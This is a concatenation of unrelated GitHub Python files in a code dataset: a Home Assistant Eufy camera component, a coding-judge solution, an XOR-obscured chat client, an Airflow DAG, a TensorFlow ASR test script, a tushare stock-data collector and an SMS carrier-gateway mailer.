CameraMjpeg(self.ffmpeg_binary)\n await stream.open_camera(await self.stream_source())\n\n try:\n return await async_aiohttp_proxy_stream(\n self.hass,\n request,\n await stream.get_reader(),\n self.ffmpeg_content_type,\n )\n finally:\n await stream.close()\n\n def turn_on(self) -> None:\n asyncio.run_coroutine_threadsafe(\n self.start_stream_function(), self.coordinator.hass.loop\n ).result()\n\n def turn_off(self) -> None:\n asyncio.run_coroutine_threadsafe(\n self.stop_stream_function(), self.coordinator.hass.loop\n ).result()\n\n async def check_and_notify_rtsp_enabled(self):\n if self.device.state.get(\"rtspStream\") is False:\n 
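# Surface a persistent notification in the Home Assistant UI so the user
# knows that RTSP must first be enabled on the camera itself.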
self.coordinator.hass.components.persistent_notification.async_create(\n f\"RTSP needs to be enabled for Camera {self.device.name}\",\n title=\"Eufy Security - Not Enabled - RTSP\",\n notification_id=\"eufy_security_not_enabled_rtsp\",\n )\n return False\n return True\n\n async def check_and_notify_rtsp_supported(self):\n if self.device.state.get(\"rtspStream\", None) is None:\n self.coordinator.hass.components.persistent_notification.async_create(\n f\"Camera {self.device.name} does not support RTSP\",\n title=\"Eufy Security - Not Supported - RTSP\",\n notification_id=\"eufy_security_not_supported_rtsp\",\n )\n return False\n return True\n\n async def async_start_p2p_livestream(self, executed_at=None) -> None:\n await self.coordinator.async_set_p2p_livestream(\n self.device.serial_number, \"start\"\n )\n\n async def async_stop_p2p_livestream(self) -> None:\n await self.coordinator.async_set_p2p_livestream(\n self.device.serial_number, \"stop\"\n )\n\n async def async_start_rtsp_livestream(self, executed_at=None) -> None:\n if (\n await self.check_and_notify_rtsp_supported() is True\n and await self.check_and_notify_rtsp_enabled()\n ):\n await self.coordinator.async_set_rtsp_livestream(\n self.device.serial_number, \"start\"\n )\n\n async def async_stop_rtsp_livestream(self) -> None:\n if (\n await self.check_and_notify_rtsp_supported() is True\n and await self.check_and_notify_rtsp_enabled()\n ):\n await self.coordinator.async_set_rtsp_livestream(\n self.device.serial_number, \"stop\"\n )\n\n async def async_enable_rtsp(self) -> None:\n if await self.check_and_notify_rtsp_supported() is True:\n await self.coordinator.async_set_rtsp(self.device.serial_number, True)\n\n async def async_disable_rtsp(self) -> None:\n if await self.check_and_notify_rtsp_supported() is True:\n await self.coordinator.async_set_rtsp(self.device.serial_number, False)\n\n async def async_enable(self) -> None:\n await self.coordinator.async_set_device_state(self.device.serial_number, True)\n\n async def async_disable(self) -> None:\n await self.coordinator.async_set_device_state(self.device.serial_number, False)\n\n async def async_get_rtsp_livestream_status(self) -> None:\n await self.coordinator.async_get_rtsp_livestream_status(\n self.device.serial_number\n )\n\n async def async_quick_response(self, voice_id) -> None:\n if self.device.is_doorbell() is False:\n _LOGGER.warning(\n f\"{DOMAIN} {self.name} - quick_response is only supported for doorbells\"\n )\n raise HomeAssistantError(\n f\"{self.name} - quick_response is only supported for doorbells\"\n )\n await self.coordinator.async_quick_response(self.device.serial_number, voice_id)\n\n def async_reset_alarm(self) -> None:\n asyncio.run_coroutine_threadsafe(\n self.coordinator.async_reset_camera_alarm(self.device.serial_number),\n self.coordinator.hass.loop,\n ).result()\n\n def async_alarm_trigger_with_duration(self, duration: int = 10) -> None:\n asyncio.run_coroutine_threadsafe(\n self.coordinator.async_trigger_camera_alarm(\n self.device.serial_number, duration\n ),\n self.coordinator.hass.loop,\n ).result()\n\n @property\n def is_on(self):\n return self.device.state.get(\"enabled\", True)\n\n @property\n def motion_detection_enabled(self):\n return self.device.state.get(\"motionDetection\", False)\n\n @property\n def extra_state_attributes(self):\n custom_attributes = {\n \"is_streaming\": self.device.is_streaming,\n \"stream_source_type\": self.device.stream_source_type,\n \"stream_source_address\": self.device.stream_source_address,\n \"codec\": 
self.device.codec,\n \"is_rtsp_streaming\": self.device.is_rtsp_streaming,\n \"is_p2p_streaming\": self.device.is_p2p_streaming,\n }\n if self.device.voices:\n custom_attributes[\"voices\"] = self.device.voices\n return {\n \"inherited\": super().state_attributes,\n \"custom\": custom_attributes,\n }\n","repo_name":"bachya/smart-home","sub_path":"hass/settings/custom_components/eufy_security/camera.py","file_name":"camera.py","file_ext":"py","file_size_in_byte":22669,"program_lang":"python","lang":"en","doc_type":"code","stars":265,"dataset":"github-code","pt":"37"} +{"seq_id":"70249610348","text":"while True:\n N = int(input())\n\n if(N == 0):\n break\n\n students = []\n\n for i in range(N):\n name, height = input().split()\n\n students.append([name, float(height)])\n\n students.sort(key=lambda x: x[1], reverse=True)\n\n tmp = students[0][1]\n\n for i in range(N):\n if students[i][1] != tmp:\n break\n print(students[i][0], end=\" \")\n print()\n","repo_name":"firemancha/Algorithm","sub_path":"Baekjoon/11000~11999/[11292]키 큰 사람/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2584257082","text":"#!/usr/bin/python2\n#-*- coding:utf-8 -*-\n\nimport os\nimport time\nimport platform\nimport socket\nimport sys\nimport select\nimport logging\nimport readline\n\nbanner = '''\n\\033[1;96m\n ██████ ▓█████ ▄████▄ ██▀███ ▓█████▄▄▄█████▓\n▒██ ▒ ▓█ ▀ ▒██▀ ▀█ ▓██ ▒ ██▒▓█ ▀▓ ██▒ ▓▒\n░ ▓██▄ ▒███ ▒▓█ ▄ ▓██ ░▄█ ▒▒███ ▒ ▓██░ ▒░\n ▒ ██▒▒▓█ ▄ ▒▓▓▄ ▄██▒▒██▀▀█▄ ▒▓█ ▄░ ▓██▓ ░ \n▒██████▒▒░▒████▒▒ ▓███▀ ░░██▓ ▒██▒░▒████▒ ▒██▒ ░ \n▒ ▒▓▒ ▒ ░░░ ▒░ ░░ ░▒ ▒ ░░ ▒▓ ░▒▓░░░ ▒░ ░ ▒ ░░ \n░ ░▒ ░ ░ ░ ░ ░ ░ ▒ ░▒ ░ ▒░ ░ ░ ░ ░ \n░ ░ ░ ░ ░ ░░ ░ ░ ░ \n ░ ░ ░░ ░ ░ ░ ░ \n ░ \n\n\n [ Created By Unamed ]\n [  Github : \\033[31mUnam3dd\\033[00m ]\n [ Insta : \\033[31m0x4eff\\033[00m ]\n\n Encrypted Message Live With XOR\n\\033[00m\n'''\n\ntry:\n from datetime import datetime\nexcept ImportError:\n print('\\033[31m[!] Error Datetime Install Datetime !')\n\ntry:\n from itertools import izip, cycle\n import base64\nexcept ImportError:\n print('\\033[31m[!] 
Error IterTools, Base64')\n\ndef xor_crypt_string(data, key, encode=False, decode=False):\n if decode:\n data = base64.decodestring(data)\n xored = ''.join(chr(ord(x) ^ ord(y)) for (x,y) in izip(data, cycle(key)))\n if encode:\n return base64.encodestring(xored).strip()\n return xored\n\nclass SimpleCompleter(object):\n\n def __init__(self, options):\n self.options = sorted(options)\n return\n\n def complete(self, text, state):\n response = None\n if state == 0:\n # This is the first time for this text, so build a match list.\n if text:\n self.matches = [s\n for s in self.options\n if s and s.startswith(text)]\n logging.debug('%s matches: %s', repr(text), self.matches)\n else:\n self.matches = self.options[:]\n logging.debug('(empty input) matches: %s', self.matches)\n\n # Return the state'th item from the match list,\n # if we have that many.\n try:\n response = self.matches[state]\n except IndexError:\n response = None\n logging.debug('complete(%s, %s) => %s',repr(text), state, repr(response))\n return response\n\ndef input_console(username):\n t = datetime.now().strftime('%H:%M:%S')\n sys.stdout.write('[\\033[1;94m%s\\033[00m] \\033[32m%s$ ' % (t,username))\n sys.stdout.flush()\n\ndef run_client(host,port,xor_key,username):\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.settimeout(2)\n try:\n s.connect((host,int(port)))\n except:\n print('\\033[31m[!] Error Unable Connect %s:%s' % (host,port))\n sys.exit()\n \n input_console(username)\n while True:\n socket_list = [sys.stdin, s]\n read_sockets, write_sockets, error_sockets = select.select(socket_list, [], [])\n for sock in read_sockets:\n if sock ==s:\n data = s.recv(4096)\n if not data:\n print('\\n[!] (503) Server Error !')\n else:\n decode_data = xor_crypt_string(data,xor_key,decode=True)\n sys.stdout.write('\\n\\033[31m'+decode_data+'\\033[00m')\n input_console(username)\n else:\n msg = sys.stdin.readline()\n \n if msg.startswith('/exit')==True:\n data_encode = xor_crypt_string(msg,xor_key,encode=True)\n s.send(data_encode)\n sys.exit()\n\n elif msg.startswith('/clear')==True:\n clear_os()\n string = username+\":\\033[1;96m%s has cleared console\\033[00m\\n\" % (username)\n data_encode = xor_crypt_string(string,xor_key,encode=True)\n s.send(data_encode)\n input_console(username)\n\n else:\n string = username+\":\"+msg\n data_encode = xor_crypt_string(string,xor_key,encode=True)\n s.send(data_encode)\n print('\\033[32m[\\033[34m+\\033[32m] Message Sent !')\n input_console(username)\n\ndef clear_os():\n if 'Linux' not in platform.platform():\n os.system('cls')\n \n elif 'Windows' not in platform.platform():\n os.system('clear')\n\n\nif __name__ == '__main__':\n if 'Linux' not in platform.platform():\n sys.exit(\"[*] Linux Platform Required !\")\n\n print(banner)\n if len(sys.argv) <5:\n print('usage : %s <host> <port> <xor_key> <username>' % (sys.argv[0]))\n else:\n clear_os()\n print(banner)\n run_client(sys.argv[1],sys.argv[2],sys.argv[3],sys.argv[4])","repo_name":"HiFeV/Train-2018-2020","sub_path":"S3cr3t/S3cr3t_client.py","file_name":"S3cr3t_client.py","file_ext":"py","file_size_in_byte":5339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70235436586","text":"from airflow import DAG\r\nfrom datetime import datetime, timedelta\r\n\r\nfrom airflow.utils.dates import days_ago\r\n\r\nfrom airflow.operators.bash import BashOperator\r\n\r\ndefault_args = {\r\n 'owner': 'airflow',\r\n 'depends_on_past': False,\r\n 'email': ['lax@gmail.com', 'lax1@gmail.com'],\r\n 'email_on_failure': False,\r\n 
'email_on_retry': False,\r\n 'retries': 1,\r\n 'retry_delay': timedelta(minutes=5)\r\n}\r\nwith DAG(\r\n 'hello_world',\r\n default_args=default_args,\r\n description='Hello world description',\r\n start_date=days_ago(20),\r\n tags=['lax']\r\n) as dag:\r\n\r\n t1 = BashOperator(\r\n task_id='print_msg',\r\n bash_command=\"echo 'hello_world'\"\r\n )\r\n\r\n t2 = BashOperator(\r\n task_id='print_msg_again',\r\n bash_command=\"echo 'hello_world again'\"\r\n )\r\n\r\n t1 >> t2\r\n","repo_name":"laxmikanth-d/Airflow","sub_path":"dags/hello_world.py","file_name":"hello_world.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36689405845","text":"# coding=utf-8\n\nimport logging\nimport os\nfrom os import path\n\nimport tensorflow as tf\n\ntry:\n from . import asr\nexcept SystemError:\n import asr\n\nFLAGS = tf.app.flags.FLAGS\n\ntf.app.flags.DEFINE_float('gpu_memory_fraction', 0.4, 'fraction of GPU memory to use')\ntf.app.flags.DEFINE_string('model_dir', \"../data/model_distribute/\",\n 'directory where model data is saved')\n\n\ndef test():\n \"\"\"Standalone test of model performance.\n\n \"\"\"\n data_dir = FLAGS.data_dir\n cv_batch_size = FLAGS.cv_batch_size\n cv_maxsize_file = path.join(data_dir, FLAGS.cv_maxsize_file)\n dev_data_config = asr.read_data_config(cv_maxsize_file)\n dev_data = asr.get_dev_data(dev_data_config, cv_batch_size)\n dev_examples_num = dev_data_config.example_number\n dev_num_batches_per_epoch = int(dev_examples_num / cv_batch_size)\n\n with tf.variable_scope(\"inference\") as scope:\n dev_ctc_in, dev_targets, dev_seq_len = asr.rnn(dev_data, dev_data_config,\n cv_batch_size)\n\n dev_decoded, dev_log_prob = tf.nn.ctc_greedy_decoder(dev_ctc_in,\n dev_seq_len)\n\n edit_distance = tf.edit_distance(tf.to_int32(dev_decoded[0]), dev_targets,\n normalize=False)\n\n batch_error_count = tf.reduce_sum(edit_distance, name=\"batch_error_count\")\n batch_label_count = tf.shape(dev_targets.values)[0]\n\n local_init = tf.initialize_local_variables()\n saver = tf.train.Saver()\n\n gpu_options = tf.GPUOptions(\n per_process_gpu_memory_fraction=FLAGS.gpu_memory_fraction)\n\n with tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)) as session:\n\n ckpt = tf.train.get_checkpoint_state(FLAGS.model_dir)\n saver.restore(session, ckpt.model_checkpoint_path)\n\n global_step = int(ckpt.model_checkpoint_path.split('/')[-1].split('-')[-1])\n\n logging.info(\"Loading model parameters from %s, global_step = %d\",\n ckpt.model_checkpoint_path, global_step)\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=session, coord=coord)\n\n try:\n dev_error_count = 0\n dev_label_count = 0\n\n for batch in range(dev_num_batches_per_epoch):\n cv_error_count_value, cv_label_count = session.run(\n [batch_error_count, batch_label_count])\n\n dev_error_count += cv_error_count_value\n dev_label_count += cv_label_count\n\n dev_acc_ratio = (dev_label_count - dev_error_count) / dev_label_count\n\n logging.info(\"eval: eval_acc = %.3f \", dev_acc_ratio)\n except tf.errors.OutOfRangeError:\n logging.info(\"Training finished.\")\n finally:\n coord.request_stop()\n\n coord.join(threads)\n\n\ndef main(_):\n test()\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%a, %d %b %Y %H:%M:%S',\n filename='./test.log',\n filemode='a')\n\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = \"2\"\n 
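# tf.app.run() parses the FLAGS defined above and then calls main(_);
# setting CUDA_VISIBLE_DEVICES first pins this process to GPU 2.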
tf.app.run()\n","repo_name":"thewintersun/asrtrain","sub_path":"newbin/asr_test.py","file_name":"asr_test.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21202970869","text":"# -*- coding: utf-8 -*-\n__author__ = 'SlovEnt'\n__date__ = '2019/1/7 10:50'\n\n# %% Import packages\nimport tushare as ts\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom collections import OrderedDict\nimport os\nimport re\nimport time\nfrom multiprocessing import Pool, Manager\n# from exec_class import Tushare_Proc\nfrom tushare_exe_class import Tushare_Proc_v2\nimport traceback\n\nfrom chpackage.param_info import get_param_info\nBASE_DIR = os.path.dirname(os.getcwd())\nCONFIG_INFO_FILE = \"%s/%s\" % (BASE_DIR, \"Config.ini\")\nPARAINFO = get_param_info(CONFIG_INFO_FILE)\n\n# Import MySQL helper functions\nfrom chpackage import torndb\nmysqlExe = torndb.Connection(\n host = \"{0}:{1}\".format(PARAINFO[\"DB_HOST\"], PARAINFO[\"DB_PORT\"]),\n database = PARAINFO[\"DB_NAME\"],\n user = PARAINFO[\"USER_NAME\"],\n password = PARAINFO[\"USER_PWD\"],\n)\n\npro = ts.pro_api(PARAINFO[\"TUSHARE_TOKEN\"])\n\n# tp = Tushare_Proc(pro, mysqlExe)\n# tp = Tushare_Proc(pro, mysqlExe, busiDate=\"20190106\")\ntp2 = Tushare_Proc_v2(pro, mysqlExe, busiDate=\"20190106\")\n\ndef get_tpdatas_stock_basic(cFlag, q):\n\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"inputCode\"] = \"\"\n argsDict[\"codeType\"] = \"\"\n\n strSqlList = tp2.get_tpdatas_stock_basic(argsDict)\n\n if len(strSqlList) == 0:\n return\n\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_stock_company(cFlag, q):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"exchange\"\n\n argsDict[\"inputCode\"] = \"SSE\"\n strSqlList = tp2.get_tpdatas_stock_company(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\n argsDict[\"inputCode\"] = \"SZSE\"\n strSqlList = tp2.get_tpdatas_stock_company(argsDict)\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_hs_const(cFlag, q):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"hs_type\"\n\n argsDict[\"inputCode\"] = \"SH\"\n strSqlList = tp2.get_tpdatas_hs_const(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\n argsDict[\"inputCode\"] = \"SZ\"\n strSqlList = tp2.get_tpdatas_hs_const(argsDict)\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_namechange(cFlag, q):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"\"\n argsDict[\"inputCode\"] = \"\"\n\n strSqlList = tp2.get_tpdatas_namechange(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_new_share(cFlag, q):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"start_date\"\n argsDict[\"inputCode\"] = \"\"\n\n strSqlList = tp2.get_tpdatas_new_share(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_concept(cFlag, q):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"src\"\n argsDict[\"inputCode\"] = \"ts\"\n\n strSqlList = tp2.get_tpdatas_concept(argsDict)\n\n if len(strSqlList) == 0:\n return\n\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_index_basic(cFlag, q, inputCode):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n 
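# codeType names the sys_dict category to enumerate; the caller
# (run_m_get_all_basic_datas below) passes one "market" dictionary item
# per call as inputCode.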
argsDict[\"inputCode\"] = inputCode\n\n strSqlList = tp2.get_tpdatas_index_basic(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_fund_basic(cFlag, q, inputCode):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"market\"\n argsDict[\"inputCode\"] = inputCode\n\n strSqlList = tp2.get_tpdatas_fund_basic(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_fut_basic(cFlag, q, inputCode):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"exchange\"\n argsDict[\"inputCode\"] = inputCode\n\n strSqlList = tp2.get_tpdatas_fut_basic(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_opt_basic(cFlag, q, inputCode):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"exchange\"\n argsDict[\"inputCode\"] = inputCode\n\n strSqlList = tp2.get_tpdatas_opt_basic(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\ndef get_tpdatas_fund_company(cFlag, q):\n argsDict = {}\n argsDict[\"recollect\"] = cFlag\n argsDict[\"codeType\"] = \"\"\n argsDict[\"inputCode\"] = \"\"\n\n strSqlList = tp2.get_tpdatas_fund_company(argsDict)\n\n if len(strSqlList) != 0:\n for strSql in strSqlList:\n q.put(strSql)\n\n\ndef put_in_db(q, i):\n try:\n while True:\n strSql = q.get()\n print(strSql)\n mysqlExe.execute(strSql)\n except Exception as e:\n print(e, strSql)\n\ndef run_m_get_all_basic_datas():\n\n manage = Manager()\n q = manage.Queue(maxsize=100000)\n\n p = Pool(15)\n\n for i in range(8):\n p.apply_async(func=put_in_db, args=(q,i,))\n\n # 第一个入参明确是否强制重新采集 0 采集后不重采 1 强制重采\n p.apply_async(func=get_tpdatas_stock_basic, args=(\"0\",q,))\n p.apply_async(func=get_tpdatas_stock_company, args=(\"0\",q,))\n p.apply_async(func=get_tpdatas_namechange, args=(\"0\",q,))\n p.apply_async(func=get_tpdatas_hs_const, args=(\"0\",q,))\n p.apply_async(func=get_tpdatas_new_share, args=(\"0\",q,))\n p.apply_async(func=get_tpdatas_concept, args=(\"0\",q,))\n\n sysDicts = tp2.get_datas_for_db_sys_dict(\"market\")\n for sysDict in sysDicts:\n p.apply_async(func=get_tpdatas_index_basic, args=(\"0\", q, sysDict[\"dict_item\"]))\n\n p.apply_async(func=get_tpdatas_fund_basic, args=(\"0\", q, \"E\"))\n p.apply_async(func=get_tpdatas_fund_basic, args=(\"0\", q, \"O\"))\n p.apply_async(func=get_tpdatas_fund_company, args=(\"0\", q))\n\n\n # 期货合约信息表\n exchangeCodeList = [\"CFFEX\",\"DCE\",\"CZCE\",\"SHFE\",\"INE\"]\n for exchangeCode in exchangeCodeList:\n p.apply_async(func=get_tpdatas_fut_basic, args=(\"0\", q, exchangeCode))\n\n # 期权合约\n exchangeCodeList = [\"SSE\"]\n for exchangeCode in exchangeCodeList:\n p.apply_async(func=get_tpdatas_opt_basic, args=(\"1\", q, exchangeCode))\n\n p.close()\n p.join()\n\n\nif __name__ == '__main__':\n\n # 获取各交易所的交易日历,每年年底再打开获取打开获取\n # exchangeCodeList = tp2.get_datas_for_db_sys_dict(\"exchange\")\n # for exchangeCode in exchangeCodeList:\n # tp2.get_tpdatas_trade_cal_2_db(exchangeCode[\"dict_item\"],\"20191201\",\"20101231\")\n\n run_m_get_all_basic_datas()\n","repo_name":"SlovEnt/tushare_env","sub_path":"PROC_LIST/m_get_all_basic_datas.py","file_name":"m_get_all_basic_datas.py","file_ext":"py","file_size_in_byte":6771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38408116789","text":"# -*- coding: utf-8 -*-\n'''\nSMS functions for CorpScores.\n\nSpecial thanks to 
github.com/brendanlim/sms-fu for the carrier gateways.\n'''\n\n\nfrom flask.ext.mail import Message\n\nfrom .extensions import mail\n\n\ndef split_msg(message):\n '''Split an SMS into chunks of at most max_len characters, if possible at newlines.'''\n max_len = 130\n chunks = []\n while len(message) > max_len:\n # Split message into chunks gracefully at newlines\n try:\n idx = message[:max_len].rindex('\\n')\n except ValueError:\n # No newline found in first max_len characters\n idx = max_len\n chunks.append(message[:idx])\n message = message[idx:].strip()\n if message:\n chunks.append(message)\n return chunks\n\n\ndef send_sms(carrier, number, message, subject=None, conn=None):\n '''Send an SMS message'''\n chunks = split_msg(message)\n for chunk in chunks:\n if subject:\n msg = Message(subject,\n sender=mail.app.config['SMS_DEFAULT_SENDER'],\n recipients=[str(number) + carriers[carrier]['suffix']])\n else:\n msg = Message('',\n sender=mail.app.config['SMS_DEFAULT_SENDER'],\n recipients=[str(number) + carriers[carrier]['suffix']])\n msg.body = chunk\n if conn:\n conn.send(msg)\n else:\n mail.send(msg)\n\n# US Carriers\ncarriers = {\n \"alltel\": {\n \"name\": \"Alltel\",\n \"suffix\": \"@message.alltel.com\"\n },\n \"ameritech\": {\n \"name\": \"Ameritech\",\n \"suffix\": \"@paging.acswireless.com\"\n },\n \"at&t\": {\n \"name\": \"AT&T\",\n \"suffix\": \"@txt.att.net\"\n },\n \"bell_atlantic\": {\n \"name\": \"Bell Atlantic\",\n \"suffix\": \"@message.bam.com\"\n },\n \"bellsouthmobility\": {\n \"name\": \"Bellsouth Mobility\",\n \"suffix\": \"@blsdcs.net\"\n },\n \"blueskyfrog\": {\n \"name\": \"BlueSkyFrog\",\n \"suffix\": \"@blueskyfrog.com\"\n },\n \"boost\": {\n \"name\": \"Boost Mobile\",\n \"suffix\": \"@myboostmobile.com\"\n },\n \"cellularsouth\": {\n \"name\": \"Cellular South\",\n \"suffix\": \"@csouth1.com\"\n },\n \"comcast\": {\n \"name\": \"Comcast PCS\",\n \"suffix\": \"@comcastpcs.textmsg.com\"\n },\n \"cricket\": {\n \"name\": \"Cricket\",\n \"suffix\": \"@sms.mycricket.com\"\n },\n \"kajeet\": {\n \"name\": \"kajeet\",\n \"suffix\": \"@mobile.kajeet.net\"\n },\n \"metropcs\": {\n \"name\": \"Metro PCS\",\n \"suffix\": \"@mymetropcs.com\"\n },\n \"nextel\": {\n \"name\": \"Nextel\",\n \"suffix\": \"@messaging.nextel.com\"\n },\n \"powertel\": {\n \"name\": \"Powertel\",\n \"suffix\": \"@ptel.net\"\n },\n \"pscwireless\": {\n \"name\": \"PSC Wireless\",\n \"suffix\": \"@sms.pscel.com\"\n },\n \"qwest\": {\n \"name\": \"Qwest\",\n \"suffix\": \"@qwestmp.com\"\n },\n \"southernlink\": {\n \"name\": \"Southern Link\",\n \"suffix\": \"@page.southernlinc.com\"\n },\n \"sprint\": {\n \"name\": \"Sprint PCS\",\n \"suffix\": \"@messaging.sprintpcs.com\"\n },\n \"suncom\": {\n \"name\": \"Suncom\",\n \"suffix\": \"@tms.suncom.com\"\n },\n \"t_mobile\": {\n \"name\": \"T-Mobile\",\n \"suffix\": \"@tmomail.net\"\n },\n \"tracfone\": {\n \"name\": \"Tracfone\",\n \"suffix\": \"@mmst5.tracfone.com\"\n },\n \"telus_mobility\": {\n \"name\": \"Telus Mobility\",\n \"suffix\": \"@msg.telus.com\"\n },\n \"uscellular\": {\n \"name\": \"US Cellular\",\n \"suffix\": \"@email.uscc.net\"\n },\n \"virgin\": {\n \"name\": \"Virgin Mobile\",\n \"suffix\": \"@vmobl.net\"\n },\n \"verizon\": {\n \"name\": \"Verizon Wireless\",\n \"suffix\": \"@vtext.com\"\n }\n}\n\n# International Carriers\ninternational_carriers = {\n \"aliant_canada\": {\n \"name\": \"Aliant (Canada)\",\n \"suffix\": \"@chat.wirefree.ca\"\n },\n \"beeline_ua\": {\n \"name\": \"Beeline\",\n \"suffix\": \"@sms.beeline.ua\"\n },\n 
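# Each entry maps a carrier slug to its email-to-SMS gateway; a message is
# delivered by mailing <number><suffix>, which is what send_sms() builds above.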
\"bellmobility_canada\": {\n \"name\": \"Bell Mobility (Canada)\",\n \"suffix\": \"@txt.bell.ca\"\n },\n \"bpl_mobile\": {\n \"name\": \"BPL Mobile\",\n \"suffix\": \"@bplmobile.com\"\n },\n \"claro_brazil\": {\n \"name\": \"Claro (Brazil)\",\n \"suffix\": \"@clarotorpedo.com.br\"\n },\n \"claro_nicaragua\": {\n \"name\": \"Claro (Nicaragua)\",\n \"suffix\": \"@ideasclaro-ca.com\"\n },\n \"du_arab_emirates\": {\n \"name\": \"Du (UAE)\",\n \"suffix\": \"@email2sms.ae\"\n },\n \"e_plus_germany\": {\n \"name\": \"E-Plus (Germany)\",\n \"suffix\": \"@smsmail.eplus.de\"\n },\n \"etisalat_arab_emirates\": {\n \"name\": \"Etisalat (UAE)\",\n \"suffix\": \"@email2sms.ae\"\n },\n \"fido_canada\": {\n \"name\": \"Fido\",\n \"suffix\": \"@fido.ca\"\n },\n \"koodoo\": {\n \"name\": \"Koodoo (Canada)\",\n \"suffix\": \"@msg.koodomobile.com\"\n },\n \"manitobatelecom_canada\": {\n \"name\": \"Manitoba Telecom (Canada)\",\n \"suffix\": \"@text.mtsmobility.com\"\n },\n \"mobinil_egypt\": {\n \"name\": \"Mobinil\",\n \"suffix\": \"@mobinil.net\"\n },\n \"mobistar_belgium\": {\n \"name\": \"Mobistar (Belgium)\",\n \"suffix\": \"@mobistar.be\"\n },\n \"mobitel\": {\n \"name\": \"Mobitel\",\n \"suffix\": \"@sms.mobitel.lk\"\n },\n \"movistar_spain\": {\n \"name\": \"Movistar (Spain)\",\n \"suffix\": \"@correo.movistar.net\"\n },\n \"northerntel_canada\": {\n \"name\": \"NorthernTel (Canada)\",\n \"suffix\": \"@txt.northerntelmobility.com\"\n },\n \"o2_germany\": {\n \"name\": \"o2 (Germany)\",\n \"suffix\": \"@o2online.de\"\n },\n \"o2_uk\": {\n \"name\": \"o2 (UK)\",\n \"suffix\": \"@mmail.co.uk\"\n },\n \"orange_mumbai\": {\n \"name\": \"Orange (Mumbai)\",\n \"suffix\": \"@orangemail.co.in\"\n },\n \"orange_netherlands\": {\n \"name\": \"Orange (Netherlands)\",\n \"suffix\": \"@sms.orange.nl\"\n },\n \"orange_uk\": {\n \"name\": \"Orange (UK)\",\n \"suffix\": \"@orange.net\"\n },\n \"rogers_wireless\": {\n \"name\": \"Rogers Wireless\",\n \"suffix\": \"@pcs.rogers.com\"\n },\n \"rogers_canada\": {\n \"name\": \"Rogers (Canada)\",\n \"suffix\": \"@pcs.rogers.ca\"\n },\n \"sasktel_canada\": {\n \"name\": \"SaskTel (canada)\",\n \"suffix\": \"@sms.sasktel.ca\"\n },\n \"sfr_france\": {\n \"name\": \"SFR (France)\",\n \"suffix\": \"@sfr.fr\"\n },\n \"t_mobile_austria\": {\n \"name\": \"T-Mobile (Austria)\",\n \"suffix\": \"@sms.t-mobile.at\"\n },\n \"t_mobile_germany\": {\n \"name\": \"T-Mobile (Germany)\",\n \"suffix\": \"@t-d1-sms.de\"\n },\n \"t_mobile_germany\": {\n \"name\": \"T-Mobile (Netherlands)\",\n \"suffix\": \"@gin.nl\"\n },\n \"t_mobile_uk\": {\n \"name\": \"T-Mobile (UK)\",\n \"suffix\": \"@t-mobile.uk.net\"\n },\n \"telebec_canada\": {\n \"name\": \"Telebec (Canada)\",\n \"suffix\": \"@txt.telebecmobilite.com\"\n },\n \"telefonica_spain\": {\n \"name\": \"Telefonica (Spain)\",\n \"suffix\": \"@movistar.net\"\n },\n \"telus_canada\": {\n \"name\": \"Telus (Canada)\",\n \"suffix\": \"@msg.telus.com\"\n },\n \"virgin_canada\": {\n \"name\": \"Virgin (Canada)\",\n \"suffix\": \"@vmobile.ca\"\n },\n \"vodafone_germany\": {\n \"name\": \"Vodafone (Germany)\",\n \"suffix\": \"@vodafone-sms.de\"\n },\n \"vodafone_egypt\": {\n \"name\": \"Vodafone 